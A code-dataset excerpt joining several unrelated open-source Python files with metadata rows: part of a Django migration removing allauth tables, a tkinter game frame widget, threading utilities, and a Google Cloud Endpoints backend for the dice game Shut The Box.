def at_least_six(chars):
return choices(chars, k=randint(6, 12))
def generate_valid_password():
"""Generate a random password of at least 18 characters.
Ensures that we're alphanumeric + punctuated.
"""
return "".join(
at_least_six(ascii_letters) + at_least_six(digits) + at_least_six(punctuation)
)
def shim_usable_passwords(apps, schema_editor):
"""Create usable passwords for OSF-based users.
This will force them to do a password reset.
"""
UserModel = apps.get_model(LOOKIT_ACCOUNTS_APP, "User") # noqa
for user in UserModel.objects.filter(
password__startswith=UNUSABLE_PASSWORD_PREFIX, is_researcher=True
):
user.password = make_password(generate_valid_password())
user.save()
DELETE_ALLAUTH_SQL = """
-- Remove Django migrations
DELETE FROM django_migrations
WHERE app IN ('{allauth_account_app_name}', 'socialaccount');
-- Get rid of permissions.
DELETE FROM auth_permission
WHERE content_type_id in (
SELECT id FROM django_content_type
WHERE app_label IN ('{allauth_account_app_name}', 'socialaccount')
);
-- Get rid of admin changes.
DELETE FROM django_admin_log
WHERE content_type_id in (
SELECT id FROM django_content_type
WHERE app_label IN ('{allauth_account_app_name}', 'socialaccount')
);
-- Delete the content types.
DELETE FROM django_content_type
WHERE app_label IN ('{allauth_account_app_name}', 'socialaccount');
-- Drop tables
DROP TABLE IF EXISTS account_emailconfirmation CASCADE;
DROP TABLE IF EXISTS account_emailaddress;
DROP TABLE IF EXISTS socialaccount_socialtoken CASCADE;
DROP TABLE IF EXISTS socialaccount_socialapp_sites CASCADE;
DROP TABLE IF EXISTS socialaccount_socialapp CASCADE;
DROP TABLE IF EXISTS socialaccount_socialaccount;
""".format(
allauth_account_app_name=ALLAUTH_ACCOUNT_APP
)
class Migration(migrations.Migration):
dependencies = [
("admin", "0003_logentry_add_action_flag_choices"),
# If we don't add the above, tests will fail due to the fact that
# we use a custom default admin site.
# TODO: Investigate why and where Django's test harness fails to create
# these models, and then either file a bug or use a better fix.
("accounts", "0048_add_otp_model"),
]
operations = [
migrations.RunSQL(DELETE_ALLAUTH_SQL),
migrations.RunPython(shim_usable_passwords),
]
| apache-2.0 | -547,134,564,662,866,400 | 30.119565 | 86 | 0.701013 | false | 3.817333 | false | false | false |
ronaldsantos63/tkGAME | lib/widgets/game_frame.py | 1 | 2161 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
tkGAME - all-in-one Game library for Tkinter
Copyright (c) 2014+ Raphaël Seban <[email protected]>
This program is free software: you can redistribute it and/or
modify it under the terms of the GNU General Public License as
published by the Free Software Foundation, either version 3 of
the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program.
If not, see http://www.gnu.org/licenses/
"""
# lib imports
from tkinter import ttk
class GameFrame (ttk.Frame):
r"""
Generic game frame component;
"""
def __init__ (self, master=None, **kw):
# super class inits
ttk.Frame.__init__(self, master)
self.configure(**self._only_tk(kw))
# member inits
self.tk_owner = master
# set widget contents
self.init_widget(**kw)
# end def
def _only_tk (self, kw):
r"""
protected method def;
filters external keywords to suit tkinter init options;
returns filtered dict() of keywords;
"""
# inits
_dict = dict()
# $ 2014-02-24 RS $
# Caution:
# TK widget *MUST* be init'ed before calling _only_tk() /!\
# self.configure() needs self.tk to work well
if hasattr(self, "tk") and hasattr(self, "configure"):
_attrs = set(self.configure().keys()) & set(kw.keys())
for _key in _attrs:
_dict[_key] = kw.get(_key)
# end for
# end if
return _dict
# end def
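    # e.g. kw = {"padding": 5, "title": "Game"} filters down to
    # {"padding": 5}, since "title" is not a ttk.Frame configure option
    # (the keyword values here are illustrative, not from this project)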
def init_widget (self, **kw):
r"""
this should be overridden in subclass;
"""
# put here your own code in subclass
pass
# end def
# end class GameFrame
| gpl-3.0 | 929,661,510,890,461,400 | 19.571429 | 69 | 0.585648 | false | 4.130019 | false | false | false |
shivanshu21/docker-volume-vsphere | esx_service/utils/threadutils.py | 9 | 3955 | # Copyright 2016 VMware, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Implements threading utilities
Written by Bruno Moura <[email protected]>
"""
import threading
import logging
from weakref import WeakValueDictionary
class LockManager(object):
"""
Thread safe lock manager class
"""
def __init__(self):
self._lock = get_lock()
self._lock_store = WeakValueDictionary()
def get_lock(self, lockname, reentrant=False):
"""
        Create or return an existing lock identified by lockname.
"""
with self._lock:
try:
lock = self._lock_store[lockname]
# logging.debug("LockManager.get_lock: existing lock: %s, %s",
# lockname, lock)
except KeyError:
lock = get_lock(reentrant)
self._lock_store[lockname] = lock
# logging.debug("LockManager.get_lock: new lock: %s, %s",
# lockname, lock)
# logging.debug("LockManager existing locks in store: %s",
# self._list_locks())
return lock
def _list_locks(self):
return self._lock_store.keys()
def list_locks(self):
"""
Return a list of existing lock names in lock store.
"""
with self._lock:
return self._list_locks()
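# Example usage of LockManager (a minimal sketch; the lock name is an
# arbitrary placeholder):
#
#   lock_manager = LockManager()
#   with lock_manager.get_lock("volume-create"):
#       pass  # critical section serialized per lock name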
def get_lock_decorator(reentrant=False):
"""
Create a locking decorator to be used in modules
"""
# Lock to be used in the decorator
lock = get_lock(reentrant)
def lock_decorator(func):
"""
Locking decorator
"""
def protected(*args, **kwargs):
"""
Locking wrapper
"""
# Get lock memory address for debugging
lockaddr = hex(id(lock))
# logging.debug("Trying to acquire lock: %s @ %s, caller: %s, args: %s %s",
# lock, lockaddr, func.__name__, args, kwargs)
with lock:
# logging.debug("Acquired lock: %s @ %s, caller: %s, args: %s %s",
# lock, lockaddr, func.__name__, args, kwargs)
return func(*args, **kwargs)
return protected
return lock_decorator
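# Example usage of the decorator factory above (a minimal sketch; the
# decorated function is hypothetical, not part of this module):
#
#   synchronized = get_lock_decorator(reentrant=True)
#
#   @synchronized
#   def update_shared_state():
#       pass  # calls are serialized by a single shared RLock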
def start_new_thread(target, args=None, daemon=False):
"""Start a new thread"""
new_thread = None
if args:
new_thread = threading.Thread(target=target, args=args)
else:
new_thread = threading.Thread(target=target)
if daemon:
new_thread.daemon = True
new_thread.start()
logging.info("Started new thread : %s with target %s and args %s",
new_thread.ident, target, args)
logging.debug("Currently active threads: %s",
get_active_threads())
def get_active_threads():
"""Return the list of active thread objects"""
return threading.enumerate()
def get_local_storage():
"""Return a thread local storage object"""
return threading.local()
def set_thread_name(name):
"""Set the current thread name"""
threading.current_thread().name = name
def get_thread_name():
"""Get the current thread name"""
return threading.current_thread().name
def get_lock(reentrant=False):
"""Return a unmanaged thread Lock or Rlock"""
if reentrant:
return threading.RLock()
else:
return threading.Lock()
| apache-2.0 | -7,395,830,211,116,294,000 | 29.19084 | 87 | 0.591909 | false | 4.145702 | false | false | false |
snackattas/ShutTheBox | pkg/main.py | 1 | 38891 | """main.py - This file creates and configures the Google Cloud Endpoints
for the ShutTheBox game, and contains part of the game logic and statistical
methods."""
import endpoints
from protorpc import remote, messages, message_types
from google.appengine.ext import ndb
from google.appengine.api import memcache
import logging
from models import User, Game, Turn
# Forms for doing the CRUD on the database
from models import CreateUserRequestForm, CreateUserResultForm
from models import EmailNotificationRequestForm, EmailNotificationResulForm
from models import NewGameRequestForm, NewGameResultForm
from models import TurnRequestForm, TurnResultForm
from models import CancelResultForm
# These next forms just read data
from models import FindGamesRequestForm, TotalFindGamesResultForm
from models import UserStatsRequestForm, UserStatsResultForm
from models import HighScoresRequestForm, TotalHighScoresResultForm
from models import LeaderboardRequestForm, UserLeaderboardResultForm, \
TotalLeaderboardResultForm
from models import AllTurnsReportResultForm
from utils import get_by_urlsafe
from collections import namedtuple
from operator import attrgetter
import pickle
# # ONLY UNCOMMENT/IMPORT THE MODULES BELOW IF USING THE test_method
# from models import InsertOrDeleteDataRequestForm, InsertOrDeleteDataResultForm
# INSERT_OR_DELETE_REQUEST = endpoints.ResourceContainer(
# InsertOrDeleteDataRequestForm)
# import json
# import requests as outside_requests
# import random
CREATE_USER_REQUEST = endpoints.ResourceContainer(CreateUserRequestForm)
EMAIL_NOTIFICATION_REQUEST = endpoints.ResourceContainer(
EmailNotificationRequestForm)
NEW_GAME_REQUEST = endpoints.ResourceContainer(NewGameRequestForm)
# Adding urlsafe_key like this makes it a required parameter and passes it as
# a path parameter in the URL
TURN_REQUEST = endpoints.ResourceContainer(TurnRequestForm,
urlsafe_key=messages.StringField(1))
URLSAFE_KEY_REQUEST = endpoints.ResourceContainer(
urlsafe_key=messages.StringField(1))
FIND_GAMES_REQUEST = endpoints.ResourceContainer(FindGamesRequestForm)
USER_STATS_REQUEST = endpoints.ResourceContainer(UserStatsRequestForm)
HIGH_SCORES_REQUEST = endpoints.ResourceContainer(HighScoresRequestForm)
LEADERBOARD_REQUEST = endpoints.ResourceContainer(LeaderboardRequestForm)
@endpoints.api(name='shut_the_box', version='v1')
class ShutTheBoxApi(remote.Service):
"""A set of methods implementing the gameplay of the classic British pub
game Shut The Box. The entire game is implemented on the server-side
through Google's Cloud Endpoints. The state of a game is remembered by
passing an individual game's entity key to the client, serving as a state
token."""
# First 4 APIs are functional and actually do things
@endpoints.method(request_message=CREATE_USER_REQUEST,
response_message=CreateUserResultForm,
path='create_user',
name='create_user',
http_method='POST')
def create_user(self, request):
"""Creates a User.
:param username (req): A unique username without leading spaces.
:type username: string
:param email (opt): A unique and valid email. Email is validated using
MAILGUN email validation API.
:type email: string
:param email_notification (opt): True by default. If True, user will
receive email notifications of outstanding active games.
:type email_notification: boolean
:returns message: A message confirming user was created, or an error
message.
:rtype message: string
:raises: ConflictException"""
# Some format checking
if not request.username:
raise endpoints.ConflictException(
'User name cannot be null')
if len(request.username) != len(request.username.lstrip(' ')):
raise endpoints.ConflictException(
'User name can not have leading spaces')
        if request.username.isspace():
            raise endpoints.ConflictException(
                'User name cannot be only spaces')
# Checking for duplicate entries
if User.query(User.username == request.username).get():
raise endpoints.ConflictException(
'A user with the name {} already exists!'.
format(request.username))
# Only check if email is valid if there is an email to check
if request.email:
if User.query(User.email == request.email).get():
raise endpoints.ConflictException(
'A user with the email {} already exists!'.
format(request.email))
# Checking if the email is valid via MAILGUN APIs
if not User.is_email_valid(request.email):
return CreateUserResultForm(
message="Email address invalid! User is not created.")
# All is good, saving User object
user = User(
username=request.username,
email=request.email,
email_notification=request.email_notification)
user.put()
else:
user = User(username=request.username)
user.put()
return CreateUserResultForm(message='User {} created!'.
format(request.username))
@endpoints.method(request_message=EMAIL_NOTIFICATION_REQUEST,
response_message=EmailNotificationResulForm,
path='email_notification',
name='email_notification',
http_method='POST')
def set_email_notification_preference(self, request):
"""Allows a user to change their email notification preference.
:param username (req): A unique username without leading spaces.
:type username: string
:param email_notification (req): If True, user will receive email
notifications of outstanding active games that haven't been played in
the last 12 hours. If False, users will stop receiving these
notifications.
:type email_notifications: boolean
:returns message: A message confirming email notification preference,
or an error.
:rtype message: string"""
user = User.query(User.username == request.username).get()
if not user:
raise endpoints.NotFoundException(
'A user with the name {} does not exist!'.\
format(request.username))
user.email_notification = request.email_notification
user.put()
return EmailNotificationResulForm(message="Email notification"\
"preferences set to {}".format(request.email_notification))
@endpoints.method(request_message=NEW_GAME_REQUEST,
response_message=NewGameResultForm,
path='new_game',
name='new_game',
http_method='POST')
def new_game(self, request):
"""Creates a new game and returns the game's urlsafe key.
:param username (req): A unique username.
:type username: string
:param number_of_tiles (req): Number of tiles to play Shut The Box with.
:type number_of_tiles: enum-{NINE, TWELVE}
:param dice_operation (req): When two dice are rolled in a turn,
this determines if the number to aim for with the flipped tiles is the
sum of the dice roll or the product.
:type dice_operation: enum-{ADDITION, MULTIPLICATION}
:returns username: User's username.
:rtype username: string
:returns number_of_tiles: Number of tiles to play Shut The Box with.
:rtype number_of_tiles: enum-{NINE, TWELVE}
:returns dice_operation: When two dice are rolled in a turn,
this determines if the number to aim for with the flipped tiles is the
sum of the dice roll or the product.
:rtype dice_operation: enum-{ADDITION, MULTIPLICATION}
:returns urlsafe_key: This serves as the state token for a game of Shut
The Box.
:rtype urlsafe-key: string
:returns message: A helpful message or an error message.
:rtype message: string
:raises: NotFoundException, ConflictException"""
user = User.query(User.username == request.username).get()
if not user:
raise endpoints.NotFoundException(
'A user with the name {} does not exist!'.\
format(request.username))
if not request.number_of_tiles or not request.dice_operation:
raise endpoints.ConflictException(
'User must specify the number of tiles and the dice operation')
game = Game.new_game(user.key, request.number_of_tiles.number,
request.dice_operation.name)
return game.to_new_game_result_form("Good luck playing Shut The"\
"Box,{}!".format(user.username))
@endpoints.method(request_message=TURN_REQUEST,
response_message=TurnResultForm,
path='game/{urlsafe_key}',
name='turn',
http_method='PUT')
def turn(self, request):
"""Plays one turn of Shut The Box.
To play Shut The Box, first call turn() with only a urlsafe_key and flip
tiles null. It returns a roll and a full set of tiles.
Each subsequent call of turn() must include both a urlsafe_key and
flip_tiles, and turn() will determine the validity of flip_tiles and
compute the next roll. The goal is to flip all the tiles and get the
lowest score possible.
:param urlsafe_key (req): The state token for a game of Shut The Box.
:type urlsafe_key: string
:param flip_tiles (opt): Leave this parameter null for the first call of
turn(). On subsequent calls, flip_tiles are the integers to be
flipped in response to the roll.
:type flip_tiles: list of non-negative integers
:returns urlsafe_key: The same urlsafe_key passed in.
:rtype urlsafe_key: string
:returns roll: A list of two integers, each between 1-6, if there are
active tiles above 7 in play. If all tiles above 7 are inactive only
one integer is returned.
:rtype roll: list of non-negative integers
:returns active_tiles: The newly computed active_tiles left after the
roll has been played.
:rtype active_tiles: A list of non-negative integers
:returns valid_move: True if flip_tiles played are valid, False if they
are not valid.
:rtype valid_move: boolean
:returns score: A running score of the active_tiles in play.
:rtype score: non-negative integer
:returns game_over: If True, game is over.
:rtype game_over: boolean
:returns message: A helpful message or an error message.
:rtype message: string
:raises: BadRequestException, ValueError"""
# First make sure the game's key is real/not game over status
game = get_by_urlsafe(request.urlsafe_key, Game)
if game.game_over:
form = TurnResultForm()
form.urlsafe_key = request.urlsafe_key
form.valid_move = False
form.game_over = True
form.message = "This game is already over. Play again by calling "\
"new_game()!"
return form
# If it's a real game, get the most recent turn
MEMCACHE_KEY = game.key.urlsafe()
recent_turn = game.most_recent_turn()
if not recent_turn:
# If recent_turn is null, this is the first roll!
turn = Turn.first_turn(game)
if not memcache.add(key=MEMCACHE_KEY, value=pickle.dumps(turn),
time=360):
logging.warning("Memcache addition failed!")
return turn.to_turn_result_form(
urlsafe_key=game.key.urlsafe(),
valid_move=True,
message="Call turn() again to play your roll")
# If it's not a user's first turn, user must pass in flip_tiles
if not request.flip_tiles:
return recent_turn.to_turn_result_form(
urlsafe_key=game.key.urlsafe(),
valid_move=False,
message="User must pass in values to flip_tiles!")
# Check if it's a valid flip
error = recent_turn.invalid_flip(request.flip_tiles,
game.dice_operation)
if error:
return recent_turn.to_turn_result_form(
urlsafe_key=game.key.urlsafe(),
valid_move=False,
message=error)
# Since it's a valid flip, end the last turn
recent_turn.end_turn()
# Create a new turn
new_turn = recent_turn.new_turn(game, request.flip_tiles)
# If the new turn does not have any active tiles, it's a perfect score
# and the game's over
if not new_turn.active_tiles:
new_turn.end_game(game)
return new_turn.to_turn_result_form(
urlsafe_key=game.key.urlsafe(),
valid_move=True,
message="Game over! Perfect score! Call new_game() to play again!")
# Check if the roll from the new turn ends the game
game_over = new_turn.is_game_over(game)
if game_over:
new_turn.end_game(game)
return new_turn.to_turn_result_form(
urlsafe_key=game.key.urlsafe(),
valid_move=True,
message="Game over! Call new_game() to play again!")
# If the code's fallen through to here, the roll is valid. Add newest turn to memcache
if not memcache.replace(key=MEMCACHE_KEY, value=pickle.dumps(new_turn),
time=360):
logging.warning("Memcache logging failed!")
return new_turn.to_turn_result_form(
urlsafe_key=game.key.urlsafe(),
valid_move=True,
message="Call turn() again to play your roll")
@endpoints.method(request_message=URLSAFE_KEY_REQUEST,
response_message=CancelResultForm,
path='cancel_game/{urlsafe_key}',
name='cancel_game',
http_method='DELETE')
def cancel_game(self, request):
"""Cancels a Game entity and its children Turn entities. User can
only cancel games in progress. This API operates under the assumpion
that it's better to just cancel games outright instead of somehow
marking them as deleted in the database.
:param urlsafe_key (req): The state token for a game of Shut The Box.
:type urlsafe_key: string
:returns cancelled: True if the game entity and Turn entities are
deleted from the datastore; False if the game entity in question is
completed.
:rtype cancelled: boolean
:returns error: Helpful error message.
:rtype error: string
:raises: BadRequestException, ValueError"""
game = get_by_urlsafe(request.urlsafe_key, Game)
if game.game_over:
return CancelResultForm(
cancelled=False,
error="Can't cancel games that are already completed.")
# This deletes both the parent game and the children turns
ndb.delete_multi(ndb.Query(ancestor=game.key).iter(keys_only=True))
return CancelResultForm(cancelled=True)
# The next APIs are statistics, game state information, and leaderboards
# They don't create, update, or delete the database, they just read from
# it
# The rubric calls for a method get_user_games, but I expanded this API to
# have that functionality and more
@endpoints.method(request_message=FIND_GAMES_REQUEST,
response_message=TotalFindGamesResultForm,
path='find_games',
name='find_games',
http_method='POST')
def find_games(self, request):
"""Searches for games matching the passed in search criteria and
returns basic information about them.
Will return an error if both games_in_progress and finished_games are
True.
:param games_in_progress (opt): False by default. If True, filters by
games in progress.
:type games_in_progress: boolean
:param finished_games (opt): False by default. If True, filters by
finished games.
:type finished_games: boolean
:param number_of_tiles (opt): Filters games by number of tiles.
:type number_of_tiles: enum-{NINE, TWELVE}
:param dice_operation (opt): Filters games by dice operation.
:type dice_operation: enum-{ADDITION, MULTIPLICATION}
:param username (opt): Filters by username.
:type username: string
:returns games: A list of games. Each game is made up of the parameters
below.
:rtype games: list
:returns urlsafe_key: The state token for this game of Shut The Box.
:rtype urlsafe_key: string
:returns number_of_tiles: Number of tiles for this game.
:rtype number_of_tiles: enum-{NINE, TWELVE}
:returns dice_operation: Dice operation for this game.
:rtype dice_operation: enum-{ADDITION, MULTIPLICATION}
:returns game_over: If True, this game is over.
:rtype game_over: boolean
:returns turns_played: Number of turns played for this game.
:rtype turns_played: integer
:raises: NotFoundException, BadRequestException"""
# if username is passed in, look for only their games
if request.username:
user = User.query(User.username == request.username).get()
if not user:
raise endpoints.NotFoundException(
'A user with the name {} does not exist!'.\
format(request.username))
games_query = Game.query(ancestor=user.key)
else:
games_query = Game.query()
if request.games_in_progress == True \
and request.finished_games == True:
raise endpoints.BadRequestException("games_report can't be called "
"with both parameters games_in_progress and finished_games "
"True")
if request.games_in_progress:
games_query = games_query.filter(Game.game_over == False)
if request.finished_games:
games_query = games_query.filter(Game.game_over == True)
if request.number_of_tiles:
games_query = games_query.filter(
Game.number_of_tiles == request.number_of_tiles.number)
if request.dice_operation:
games_query = games_query.filter(
Game.dice_operation == request.dice_operation.name)
# Return the most recent games first
games_query = games_query.order(-Game.timestamp)
games = games_query.fetch()
return TotalFindGamesResultForm(
games=[game.to_find_games_result_form() for game in games])
@endpoints.method(request_message=USER_STATS_REQUEST,
response_message=UserStatsResultForm,
path='user_stats',
name='user_stats',
http_method='POST')
def get_user_stats(self, request):
"""Returns user statistics for a particular user.
The statistics are completed games, total score, total turns, average
score, and average turns. Able to filter by dice operation and number
of dice.
:param username (req): A unique username.
:type username: string
:param number_of_tiles (opt): If specified, filters to return games
with the specified number_of_tiles.
:type number_of_tiles: enum-{NINE, TWELVE}
:param dice_operation (opt): If specified, filters to return games
with the specified dice_operation.
:type dice_operation: enum-{ADDITION, MULTIPLICATION}
:returns games_completed: Number of games completed.
:rtype games_completed: integer
:returns total_score: Total score of completed games.
:rtype total_score: integer
        :returns total_turns: Total number of turns for completed games.
        :rtype total_turns: integer
:returns average_score: Average score from completed games, rounded
to 3 decimal places.
:rtype average_score: float
        :returns average_turns: Average turns from completed games, rounded
to 3 decimal places.
:rtype average_turns: float
:returns message: Helpful error message.
:rtype message: string
:raises: NotFoundException"""
# TODO: For the life of me, I could not figure out how to make this
# method into a GET request with multiple query parameters (username,
# number_of_dice, dice_operation). I was able to figure out how to
# do it with one parameter, but not multiple. And the google
# tutorial only features GETs with 1 parameter.
# https://github.com/GoogleCloudPlatform/python-docs-samples/blob
# /master/appengine/standard/endpoints/backend/main.py
user = User.query(User.username == request.username).get()
if not user:
raise endpoints.NotFoundException(
'A user with the name {} does not exist!'.\
format(request.username))
games_query = Game.query(ancestor=user.key)
# Only return games that have a status of game_over
games_query = games_query.filter(Game.game_over == True)
# Optional filters
if request.number_of_tiles:
games_query = games_query.filter(
Game.number_of_tiles == request.number_of_tiles.number)
if request.dice_operation:
games_query = games_query.filter(
Game.dice_operation == request.dice_operation.name)
games = games_query.fetch()
if not games:
return UserStatsResultForm(message="No games found!")
(games_completed, total_score, total_turns,
average_score, average_turns) = Game.games_stats(games)
form = UserStatsResultForm(
games_completed=games_completed,
total_score=total_score,
total_turns=total_turns,
average_score=average_score,
average_turns=average_turns)
return form
@endpoints.method(request_message=HIGH_SCORES_REQUEST,
response_message=TotalHighScoresResultForm,
path='high_scores',
name='high_scores',
http_method='POST')
def get_high_scores(self, request):
"""Returns a list of high scores. In Shut The Box, lower scores are
better, so a list of high scores is a list of the scores from lowest to
        highest. In the case of a tie, the more recently finished game is
        listed first.
The high scores are able to be filtered by dice_operation or
number_of_tiles.
:param number_of_tiles (opt): If specified, filters to
return games with the specified number_of_tiles.
:type number_of_tiles: enum-{NINE, TWELVE}
:param dice_operation (opt): If specified, filters to
return games with the specified dice_operation.
:type dice_operation: enum-{ADDITION, MULTIPLICATION}
:param number_of_results (opt): Number of high scores to return
:type number_of_results: integer. DEFAULT=20
:returns high_scores: List of games ordered by high scores. Each game
contains the parameters below.
        :rtype high_scores: list
:returns score: The final score.
:rtype score: integer
:returns username: The user who played this game.
:rtype username: string
        :returns number_of_tiles: Number of tiles for this game.
:rtype number_of_tiles: enum-{NINE, TWELVE}
:returns dice_operation: Dice operation for this game.
:rtype dice_operation: enum-{ADDITION, MULTIPLICATION}
:returns timestamp: The date and time when the game was completed.
        :rtype timestamp: datetime
:returns message: Helpful error message
:rtype message: string
:raises: BadArgumentError"""
if request.number_of_results < 0:
return TotalHighScoresResultForm(message="number_of_results must "\
"not be below 0!")
# Order by the most recent lowest score
games_query = Game.query()
games_query = games_query.filter(Game.game_over == True)
if request.number_of_tiles:
games_query = games_query.filter(
Game.number_of_tiles == request.number_of_tiles.number)
if request.dice_operation:
games_query = games_query.filter(
Game.dice_operation == request.dice_operation.name)
games_query = games_query.order(Game.final_score, -Game.timestamp)
games = games_query.fetch(limit=request.number_of_results)
if not games:
return TotalHighScoresResultForm(message="No games match criteria!")
return TotalHighScoresResultForm(
high_scores=[game.to_high_scores_result_form() for game in games])
@endpoints.method(request_message=LEADERBOARD_REQUEST,
response_message=TotalLeaderboardResultForm,
path='leaderboard',
name='leaderboard',
http_method='POST')
def get_leaderboard(self, request):
"""List of ranked users. Users are ranked by average_score from low
to high, and in the case of a tie in average score, the rank is
determined by lowest average_turns.
Users are only able to be ranked if they have completed 5 or more
games. The leaderboard is able to be filtered by dice operation and/or
number of tiles.
:param number_of_tiles (opt): Filters leaderboard by number of tiles.
:type number_of_tiles: enum-{NINE, TWELVE}
:param dice_operation (opt): Filters leaderboard by dice operation.
:type dice_operation: enum-{ADDITION, MULTIPLICATION}
:param username (opt): If specified returns rank of only that user.
:type username: string
:returns ranked_users: List of users ordered by rank. Each user is
made up of the parameters below.
:rtype ranked_users: list
:returns username: A unique username.
:rtype username: string
:returns total_score: Total score of completed games.
:rtype total_score: integer
:returns average_score: Average score from completed games.
:rtype average_score: float
:returns average_turns: Average turns from completed games.
:rtype average_turns: float
:returns games_completed: Number of games completed.
:rtype games_completed: integer
:returns rank: Rank of the user.
:rtype rank: integer
:returns message: Helpful error message.
:rtype message: string
:raises: NotFoundException"""
if request.username:
user = User.query(User.username == request.username).get()
if not user:
raise endpoints.NotFoundException(
'A user with the name {} does not exist!'.\
format(request.username))
users = User.query().fetch()
if not users:
return TotalLeaderboardResultForm(message="No users created yet!")
# Create an empty leaderboard list. It will be filled with instances
# of the UserStats named tuple
leaderboard = []
UserStats = namedtuple('UserStats',
['total_score', 'average_score', 'average_turns',
'games_completed', 'username'])
for user in users:
games_query = Game.query(ancestor=user.key)
# Only use games that are over
games_query = games_query.filter(Game.game_over == True)
if request.number_of_tiles:
games_query = games_query.filter(
Game.number_of_tiles == request.number_of_tiles.number)
if request.dice_operation:
games_query = games_query.filter(
Game.dice_operation == request.dice_operation.name)
games = games_query.fetch()
# If this user has played less than 5 games, don't rank them. Must
# complete 5 or more games to become ranked, due to the nature of
# ranking in Shut The Box. It would be too easy for one user to
# play one game, get a perfect score, and then suddenly overtake
# the leaderboard
if len(games) < 5:
continue
(games_completed, total_score, total_turns, average_score,
average_turns) = Game.games_stats(games)
user_stats = UserStats(total_score, average_score,
average_turns, games_completed, user.username)
leaderboard.append(user_stats)
# if no users have completed games quit early
if not leaderboard:
return TotalLeaderboardResultForm(message="No rankable users"\
"yet!")
# Now to sort the results in this specific way
leaderboard.sort(key=attrgetter('average_score', 'average_turns',
'username'))
# Now to assign rank on the already sorted leaderboard list. It's not
# as simple as just using enumerate because of possible ties
rank = 0
last_average_score = -1
last_average_turns = -1
for n, user in enumerate(leaderboard):
rank += 1
# Take into account the tie scenario
if user.average_score == last_average_score and \
user.average_turns == last_average_turns:
rank -= 1
# Need to put the UserStats object in a list so append will work
leaderboard[n] = [leaderboard[n]]
leaderboard[n].append(rank)
# Save off the last ranked user's statistics
last_average_score = user.average_score
last_average_turns = user.average_turns
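        # Worked example of this dense ranking: average scores
        # [2.0, 2.0, 3.5], with the first two users also tied on average
        # turns, produce ranks [1, 1, 2].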
# If username is specified, make that the only result in the leaderboard
if request.username:
for ranked_user in leaderboard:
if ranked_user[0].username == request.username:
leaderboard = [ranked_user]
            if leaderboard[0][0].username != request.username:
return TotalLeaderboardResultForm(
message="{} is not ranked yet!".format(request.username))
# Now loop through the leaderboard one last time and put the content
# into a form
forms = []
for ranked_user in leaderboard:
user_stats = ranked_user[0]
rank = ranked_user[1]
leaderboard_form = UserLeaderboardResultForm(
username=user_stats.username,
average_score=user_stats.average_score,
average_turns=user_stats.average_turns,
total_score=user_stats.total_score,
games_completed=user_stats.games_completed,
rank=rank)
forms.append(leaderboard_form)
return TotalLeaderboardResultForm(ranked_users=forms)
@endpoints.method(request_message=URLSAFE_KEY_REQUEST,
response_message=AllTurnsReportResultForm,
path='game_history',
name='game_history',
http_method='POST')
def get_game_history(self, request):
"""Returns the history of moves for the game passed in, allowing game
progression to be viewed move by move.
:param urlsafe_key (req): This is the urlsafe_key returned
from calling new_game(). It serves as the state token for a single
game of Shut The Box.
:type urlsafe_key: string
:returns turns: A list of turns for a specific game. Each turn contains
the parameters below.
:rtype turns: list
:returns turn: The turn number.
:rtype turn: integer
:returns roll: The dice roll for that turn.
:rtype roll: list of non-negative integers
:returns tiles_played: The tiles flipped that turn.
:rtype tiles_played: a list of non-negative integers.
:returns score: A running total of the active tiles in play.
:rtype score: non-negative integer
:returns game_over: If True, game is over. If False,
more turns can be played.
:rtype game_over: boolean
:raises: BadRequestException, ValueError"""
game = get_by_urlsafe(request.urlsafe_key, Game)
turns = Turn.query(ancestor=game.key).order(Turn.timestamp).fetch()
# Not all the information is present in the turns object for the game
# history report. We need to manipulate the active tiles so that it
# stores the tiles played, not the tiles on the board. To do that
# we loop through the turns and calculate the difference between the
# active tiles present in the last turn vs the active tiles in the
# current turn. We use python sets and set.difference to repurpose
# active_tiles. We also score the score of each turn in this new
# active_tiles because you wouldn't be able to calculate it anymore
# with active_tiles being repurposed.
# Ex:
# Before:
# Loop 1: active_tiles: [1,2,3,4,5,6,7,8,9]
# Loop 2: active_tiles: [1,2,3,4,5,6,7,8]
# Loop 3: active_tiles: [1,2,3,6,7,8]
#
# After:
# Loop 1: active_tiles: [45, []]
# Loop 2: active_tiles: [36, [9]]
# Loop 3: active_tiles: [27, [4,5]]
for turn in turns:
# set last_turn explicitly in the first loop
if turn.turn == 0:
last_turn = set(turn.active_tiles)
current_turn = set(turn.active_tiles)
tiles_played = list(last_turn.difference(current_turn))
# Set last_turn now for the next loop
last_turn = set(turn.active_tiles)
# Now we are going to repurpose turn.active_tiles to store the
# score and the tiles played
score = sum(turn.active_tiles)
turn.active_tiles = []
turn.active_tiles.append(score)
turn.active_tiles.append(tiles_played)
return AllTurnsReportResultForm(
turns=[turn.to_turn_report_result_form() for turn in turns])
# # ONLY UNCOMMENT/IMPORT THE MODULES BELOW IF USING THE test_method
# @endpoints.method(request_message=INSERT_OR_DELETE_REQUEST,
# response_message=InsertOrDeleteDataResultForm,
# path='test_method',
# name='test_method',
# http_method='POST')
# def test_method(self, request):
# if request.delete_everything:
# users = User.query().iter(keys_only=True)
# ndb.delete_multi(users)
# games = Game.query().iter(keys_only=True)
# ndb.delete_multi(games)
# turns = Turn.query().iter(keys_only=True)
# ndb.delete_multi(turns)
# return InsertOrDeleteDataResultForm(message="All Users, Games, "\
# "Turns deleted!")
# # some setup for creating request for new games
# version = "v1"
# port = 8080
# base_url = "http://localhost:{}/_ah/api/shut_the_box/{}/".\
# format(port, version)
# new_game_url = base_url + "new_game"
# # some setup for creating the games
# DICE_OPERATION = ["ADDITION", "MULTIPLICATION"]
# NUMBER_OF_TILES = ["NINE", "TWELVE"]
#
# with open("pkg/test_data.JSON") as data_file:
# json_data = json.load(data_file)
# users = json_data["users"]
# turns = json_data["turns"]
# for user in users:
# new_user = User(
# username=user["username"],
# email=user["email"])
# new_user.put()
# # Now to create the games
# for user in users:
    #         for n in range(20): # create 20 games per user
